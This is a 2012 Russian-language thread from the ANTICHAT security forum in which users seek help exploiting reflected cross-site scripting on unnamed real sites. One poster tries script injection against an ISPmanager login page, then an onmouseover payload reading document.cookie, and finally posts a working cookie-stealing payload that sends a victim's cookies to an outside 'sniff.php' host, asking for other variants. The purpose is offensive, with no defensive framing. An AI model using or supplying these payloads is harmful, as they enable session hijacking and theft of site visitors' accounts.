HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.08.2012, 13:42
xPhoenix
Guest
Сообщений: n/a
Провел на форуме:
345

Репутация: 0
По умолчанию

мне кажется что у него уже времени на это много...
 
Ответить с цитированием

  #2  
Старый 22.09.2012, 11:50
Duskly
Guest
Сообщений: n/a
Провел на форуме:
14654

Репутация: -5
По умолчанию

Я когда вставляю код в адресную строку, у меня оно срабатывает в поиске, но не как скрипт(( что делать?
 
Ответить с цитированием

  #3  
Старый 22.09.2012, 15:29
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме:
17836

Репутация: 0
По умолчанию

второй раз вставляю пост если удаляете пишите пожалуйста почему? Имеется сайт,запрос вида: site/manager?alert(/x/); выкидывает меня на страницу вида https://site/manager/?alert(/x/);?alert(/x/); Там находится страница авторизации isp manager,НО запрос вида: site/manager/?'/

Код HTML:
HTML:
alert(/x/);
выдаёт пустую страницу,но код этой страницы таков:

Код HTML:
HTML:
location = 'https://site/manager/?'%3C/script%3E%3Cscript%3Ealert(/x/);?'%3C/script%3E%3Cscript%3Ealert(/x/);';
Насколько я понимаю, здесь соит фильтр ,который не даёт мне использовать символы ??? если мне удасться,обойти фильтрацию перекодировкой например,возможна ли здесь пассивная XSS???

...если копирую содержимое страницы на жёсткий, и там правлю, то понятное дело всё получается но как только ссылается на сайтик так лажа... что то я совсем запутался выручайте
 
Ответить с цитированием

  #4  
Старый 24.09.2012, 03:42
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме:
17836

Репутация: 0
По умолчанию

xss

Вот другая ситуация есть уязвимость в форме поиска, можно испольщзовать onmouseover= и хтмл код, ява отказывается исполняться... ...У меня два вопроса, почему не хочет исполняться ява скрипт в форме или без неё и что кроме псевдо дефейса вообще возможно выжать из этого? может быть линк на тему где ИМЕННО ЭТИ вопросы обсуждены?..

Вот новая Ремарочка... ява работает в мозиле, однако отказывается в хроме и отключается в ишаке... мои два вопроса всё же актуальны,прошу подсказать
 
Ответить с цитированием

  #5  
Старый 24.09.2012, 05:38
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме:
17836

Репутация: 0
По умолчанию

Вот простой для вас вопрос я думаю...

site/search/?q=" onmouseover=prompt(3333) />document.write(document.cookie);bad=
[/HTML]
 
Ответить с цитированием

  #6  
Старый 24.09.2012, 09:55
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме:
17836

Репутация: 0
По умолчанию

нашёл решение для снифера, работает исключительно так:

[HTML]
HTML:
www.victim.ru/search/?q=" onmouseover=/>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookiebad=(( может кто-нибудь подскажет ,другие варианты?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ